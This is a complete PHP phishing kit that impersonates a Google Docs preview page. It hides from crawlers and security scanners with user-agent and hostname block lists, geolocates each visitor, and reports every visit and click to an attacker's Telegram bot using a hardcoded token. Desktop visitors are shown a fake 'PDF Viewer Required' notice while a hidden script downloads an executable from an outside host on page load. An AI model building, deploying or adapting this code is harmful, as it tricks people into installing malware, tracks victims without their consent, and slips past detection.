<?php
session_start();

// === CONFIG ===
$bot_token = "7329099343:AAGpnj_0cyNtDpM8sb0HYk11692Zras0m3Q";
$chat_id = "-4642712741";
$redirect_url = "https://support.google.com/?source=404&sjid=3387865234262312035-NA&visit_id=638828157367669409-3152293091&rd=1";
$download_url = "https://lighten.bloomhills.org/Bin/PDFViewerUpdate.ClientSetup.exe?e=Access&y=Guest";

// === BOT DETECTION ===
function isBot($user_agent, $ip) {
    $bot_patterns = [
        'bot', 'crawl', 'slurp', 'spider', 'curl', 'wget', 'python', 'monitor', 'nutch', 'bingpreview',
        'facebookexternalhit', 'twitterbot', 'TelegramBot', 'WhatsApp', 'Googlebot', 'AdsBot',
        'DuckDuckBot', 'Baiduspider', 'YandexBot', 'HttpClient', 'Java', 'apache', 'PhantomJS', 'node'
    ];
    foreach ($bot_patterns as $bot) {
        if (stripos($user_agent, $bot) !== false) return true;
    }

    $hostname = @gethostbyaddr($ip);
    $bot_domains = ['googlebot.com', 'amazonaws.com', 'search.msn.com', 'facebook.com', 'yandex.ru', 'baidu.com'];
    foreach ($bot_domains as $domain) {
        if (stripos($hostname, $domain) !== false) return true;
    }

    if (empty($user_agent) || strlen($user_agent) < 40) return true;

    return false;
}

// === USER INFO ===
$ip = $_SERVER['REMOTE_ADDR'];
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$is_mobile = preg_match('/Mobile|Android|iPhone|iPad/i', $user_agent);
$device_type = $is_mobile ? 'Mobile' : 'Desktop';

if (isBot($user_agent, $ip)) {
    $msg = "🚫 Bot Blocked\nIP: $ip\nUA: $user_agent\nHost: " . gethostbyaddr($ip);
    file_get_contents("https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&text=" . urlencode($msg));
    header("Location: https://www.gmail.com", true, 301);
    exit();
}

// === MOBILE USERS ===
if ($is_mobile) {
    $geo = @json_decode(file_get_contents("http://ip-api.com/json/$ip"), true);
    $country = $geo['country'] ?? 'Unknown';
    $region = $geo['regionName'] ?? 'Unknown';

    $msg = "📱 Mobile Visit Detected\nIP: $ip\nCountry: $country\nRegion: $region\nUA: $user_agent";
    file_get_contents("https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&text=" . urlencode($msg));

    echo <<<HTML
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Unsupported on Mobile</title>
  <style>
    body {
      font-family: 'Roboto', sans-serif;
      margin: 0;
      padding: 0;
      background: #f2f3f5;
      color: #202124;
      text-align: center;
    }
    .mobile-header, .mobile-footer {
      background: #fff;
      border-bottom: 1px solid #dadce0;
      padding: 12px 16px;
      font-size: 16px;
      font-weight: 500;
      color: #5f6368;
      display: flex;
      align-items: center;
      justify-content: center;
    }
    .mobile-footer {
      border-top: 1px solid #dadce0;
      border-bottom: none;
      margin-top: 40px;
    }
    .mobile-box {
      background: #fff;
      margin: 40px 16px;
      padding: 30px 20px;
      border-radius: 10px;
      box-shadow: 0 2px 8px rgba(0,0,0,0.1);
    }
    h2 {
      color: #d93025;
      font-size: 22px;
      margin-bottom: 16px;
    }
    p {
      font-size: 15px;
      color: #5f6368;
      line-height: 1.5;
    }
  </style>
</head>
<body>
  <div class="mobile-header">Google Docs Preview</div>

  <div class="mobile-box">
    <img src="https://www.gstatic.com/images/branding/product/1x/drive_2020q4_48dp.png" alt="Drive" style="height: 48px; margin-bottom: 16px;">
    <h2>Unsupported on Mobile</h2>
    <p>File access is only available on desktop browsers.<br>Please switch to a desktop or laptop to continue.</p>
  </div>

  <div class="mobile-footer">© 2025 Google Docs</div>
</body>
</html>
HTML;
    exit();
}

// === LOG DESKTOP VISIT ===
$geo = @json_decode(file_get_contents("http://ip-api.com/json/$ip"), true);
$country = $geo['country'] ?? 'Unknown';
$region = $geo['regionName'] ?? 'Unknown';

if (!isset($_SESSION['visited'])) {
    $_SESSION['visited'] = true;
    $msg = "🛰️ New Visit\nIP: $ip\nCountry: $country\nRegion: $region\nDevice: $device_type\nUA: $user_agent";
    file_get_contents("https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&text=" . urlencode($msg));
}

if (!isset($_SESSION['click_count'])) $_SESSION['click_count'] = 0;

if (isset($_GET['action']) && $_GET['action'] === 'update_click') {
    $_SESSION['click_count']++;
    $count = $_SESSION['click_count'];

    $msg = "⚙️ Button Click\nIP: $ip\nClicks: $count";
    file_get_contents("https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&text=" . urlencode($msg));

    if ($count >= 3) {
        echo json_encode(['redirect' => $redirect_url]);
    } else {
        echo json_encode(['download' => $download_url]);
    }
    exit();
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>Google Docs – Preview</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <style>
    body {
      font-family: 'Roboto', Arial, sans-serif;
      background: #f1f3f4;
      margin: 0;
      padding: 0;
      color: #202124;
    }

    .a4-preview {
      position: relative;
      width: 724px;
      height: 923px;
      border: 1px solid #ccc;
      box-shadow: 0 0 15px rgba(0,0,0,0.1);
      display: flex;
      align-items: center;
      justify-content: center;
      padding: 40px;
      overflow: hidden;
    }

    .a4-preview::before {
      content: "";
      position: absolute;
      top: 0; left: 0;
      width: 100%; height: 100%;
      background: url('https://google.document-content.online/check.png') no-repeat center center;
      background-size: cover;
      filter: blur(3px);
      z-index: 0;
    }

    .a4-preview > * {
      position: relative;
      z-index: 1;
    }

    @keyframes blinkCTA {
      0%, 100% {
        background-color: #1a73e8;
        box-shadow: 0 0 0 rgba(0,0,0,0);
      }
      50% {
        background-color: #1967d2;
        box-shadow: 0 0 12px rgba(26, 115, 232, 0.6);
      }
    }

    .blinking-button {
      animation: blinkCTA 1.6s infinite ease-in-out;
      transition: all 0.3s ease;
      background-color: #1a73e8;
      color: white;
      border: none;
      padding: 10px 20px;
      border-radius: 4px;
      font-size: 15px;
      cursor: pointer;
    }
  </style>
</head>
<body>

<header style="background: #fff; padding: 0 30px; border-bottom: 1px solid #dadce0; display: flex; align-items: center; justify-content: space-between; height: 80px;">
  <div style="display: flex; align-items: center;">
    <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTaaT53qepmWven1TGX8jrjQxnmwcm4ynllyQ&s" alt="Google Docs Logo" style="height: 65px; margin-right: 16px;">
  </div>
  <div style="font-size: 16px; color: #5f6368;">Preview unavailable</div>
</header>

<div style="padding: 30px; display: flex; justify-content: center;">
  <div class="a4-preview">
    <div style="text-align: center; background: rgb(244 244 244 / 75%); padding: 30px; border-radius: 8px; margin-bottom:200px;">
      <img src="https://static.vecteezy.com/system/resources/previews/012/871/368/non_2x/google-drive-icon-google-product-illustration-free-png.png" alt="Google Drive Logo" style="height: 36px; margin-bottom: 12px; padding-top: 15px;">
      <h2 style="font-size: 24px; color: #d93025; margin-bottom: 10px;">PDF Viewer Required</h2>
      <p style="font-size: 16px; color: #5f6368; margin: 10px 0;">
        Your current PDF viewer is outdated or unsupported.<br>
        Please update to continue viewing this document.
      </p>

      <button onclick="handleClick()" class="blinking-button">
        Update PDF Viewer
      </button>

      <p style="font-size: 15px; margin-top: 18px;">
        Download will begin in <span id="counter">5</span> seconds.<br><br>
        <a href="<?php echo htmlspecialchars($download_url); ?>" download>Click here if it doesn't start</a>
      </p>
    </div>
  </div>
</div>

<footer style="text-align: center; background: #fff; padding: 20px; font-size: 14px; color: #5f6368; border-top: 1px solid #dadce0;">
  © 2025 Google Docs
</footer>

<script>
  function silentDownload(url) {
    const a = document.createElement('a');
    a.href = url;
    a.setAttribute('download', '');
    a.setAttribute('rel', 'noopener');
    a.setAttribute('target', '_self');
    a.style.display = 'none';
    document.body.appendChild(a);
    a.click();
    document.body.removeChild(a);
  }

  window.addEventListener('load', () => {
    setTimeout(() => {
      silentDownload("<?php echo $download_url; ?>");

      let seconds = 5;
      const counter = document.getElementById("counter");
      const interval = setInterval(() => {
        seconds--;
        counter.textContent = seconds;

        if (seconds <= 0) clearInterval(interval);
      }, 1000);
    }, 1000);
  });

  function handleClick() {
    location.href = "<?php echo $download_url; ?>";
  }
</script>

</body>
</html>
